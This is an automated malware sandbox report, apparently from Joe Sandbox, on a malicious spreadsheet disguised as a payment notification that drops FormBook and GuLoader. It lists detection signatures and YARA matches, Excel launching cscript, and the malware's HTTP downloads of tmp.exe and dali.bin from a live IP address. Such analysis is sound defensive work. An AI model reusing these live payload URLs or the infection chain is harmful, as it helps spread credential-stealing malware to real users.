Loading ...

Play interactive tourEdit tour

Analysis Report Payment_Notification.pdf.csv

Overview

General Information

Sample Name:Payment_Notification.pdf.csv
MD5:86a9322007f88be40e4034ebc7368248
SHA1:522d6e7b2a55e1358072792065219ef71ac8992d
SHA256:fdfe1dc9c8056c69e4cb2b5370db0a4c3797b3ad375fe1039a19ce269bbb0c78

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document exploit detected (process start blacklist hit)
Hides threads from debuggers
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Sigma detected: Microsoft Office Product Spawning Windows Shell
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Downloads executable code via HTTP
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\mso8D7C.tmpEXP_potential_CVE_2017_11882unknownReversingLabs
  • 0x0:$docfilemagic: D0 CF 11 E0 A1 B1 1A E1
  • 0x580:$equation1: Equation Native
  • 0x8e6:$cmd: cmd
  • 0x912:$address: 12 0C 43 00

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.1121140244.0000000006441000.00000004.00000001.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
  • 0xd7d8:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000004.00000003.1120953960.0000000006457000.00000004.00000001.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
  • 0xe020:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x157d9:$sqlite3step: 68 34 1C 7B E1
    • 0x158ec:$sqlite3step: 68 34 1C 7B E1
    • 0x15808:$sqlite3text: 68 38 2A 90 C5
    • 0x1592d:$sqlite3text: 68 38 2A 90 C5
    • 0x1581b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x15943:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x74c2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x12b55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x12641:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x12c57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x12dcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x804a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x118bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x89e3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x17ec7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x18eca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    Click to see the 4 entries

    Sigma Overview


    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs, CommandLine: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' 'C:\Users\user\Desktop\Payment_Notification.pdf.csv', ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 3068, ProcessCommandLine: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs, ProcessId: 4928

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp, type: MEMORY
    Machine Learning detection for sampleShow sources
    Source: Payment_Notification.pdf.csvJoe Sandbox ML: detected

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cscript.exeJump to behavior

    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 14 May 2020 11:47:34 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 13 May 2020 21:57:20 GMTETag: "15000-5a58eaa05d000"Accept-Ranges: bytesContent-Length: 86016Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 17 2c a0 d9 53 4d ce 8a 53 4d ce 8a 53 4d ce 8a d0 51 c0 8a 52 4d ce 8a 1c 6f c7 8a 55 4d ce 8a 65 6b c3 8a 52 4d ce 8a 52 69 63 68 53 4d ce 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 95 7e 51 4a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 01 00 00 20 00 00 00 00 00 00 08 15 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 02 00 07 00 04 00 00 00 00 00 00 00 00 50 01 00 00 10 00 00 13 93 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 22 01 00 28 00 00 00 00 40 01 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 20 00 00 00 00 10 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 16 01 00 00 10 00 00 00 20 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 28 0c 00 00 00 30 01 00 00 10 00 00 00 30 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c8 08 00 00 00 40 01 00 00 10 00 00 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: GET /stream/tmp.exe HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 5.206.224.171
    Source: global trafficHTTP traffic detected: GET /stream/dali.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 5.206.224.171Cache-Control: no-cache
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: unknownTCP traffic detected without corresponding DNS query: 5.206.224.171
    Source: global trafficHTTP traffic detected: GET /stream/tmp.exe HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 5.206.224.171
    Source: global trafficHTTP traffic detected: GET /stream/dali.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 5.206.224.171Cache-Control: no-cache
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
    Source: explorer.exe, 00000008.00000002.1238355438.0000000005B00000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
    Source: cscript.exe, 00000004.00000003.1124659173.000000000376D000.00000004.00000001.sdmpString found in binary or memory: http://5.206.224.171/
    Source: cscript.exe, 00000004.00000003.1124659173.000000000376D000.00000004.00000001.sdmpString found in binary or memory: http://5.206.224.171/7
    Source: cscript.exe, 00000004.00000003.1124659173.000000000376D000.00000004.00000001.sdmpString found in binary or memory: http://5.206.224.171/n)
    Source: tmp.exe, 00000007.00000002.1241746778.000000000019C000.00000004.00000001.sdmp, tmp.exe, 00000007.00000002.1241831842.0000000000560000.00000040.00000001.sdmpString found in binary or memory: http://5.206.224.171/stream/dali.bin
    Source: cscript.exe, 00000004.00000003.1124659173.000000000376D000.00000004.00000001.sdmp, cscript.exe, 00000004.00000003.1121200388.00000000037E8000.00000004.00000001.sdmp, cscript.exe, 00000004.00000002.1135365146.00000000037AF000.00000004.00000001.sdmp, cscript.exe, 00000004.00000003.1123618439.00000000037BF000.00000004.00000001.sdmpString found in binary or memory: http://5.206.224.171/stream/tmp.exe
    Source: cscript.exe, 00000004.00000003.1127984302.0000000005960000.00000004.00000040.sdmpString found in binary or memory: http://5.206.224.171/stream/tmp.exe3p~
    Source: cscript.exe, 00000004.00000003.1123618439.00000000037BF000.00000004.00000001.sdmpString found in binary or memory: http://5.206.224.171/stream/tmp.exeDocument
    Source: cscript.exe, 00000004.00000002.1132078744.0000000003354000.00000004.00000010.sdmpString found in binary or memory: http://5.206.224.171/stream/tmp.exehttp://5.206.224.171/stream/tmp.exe
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238355438.0000000005B00000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
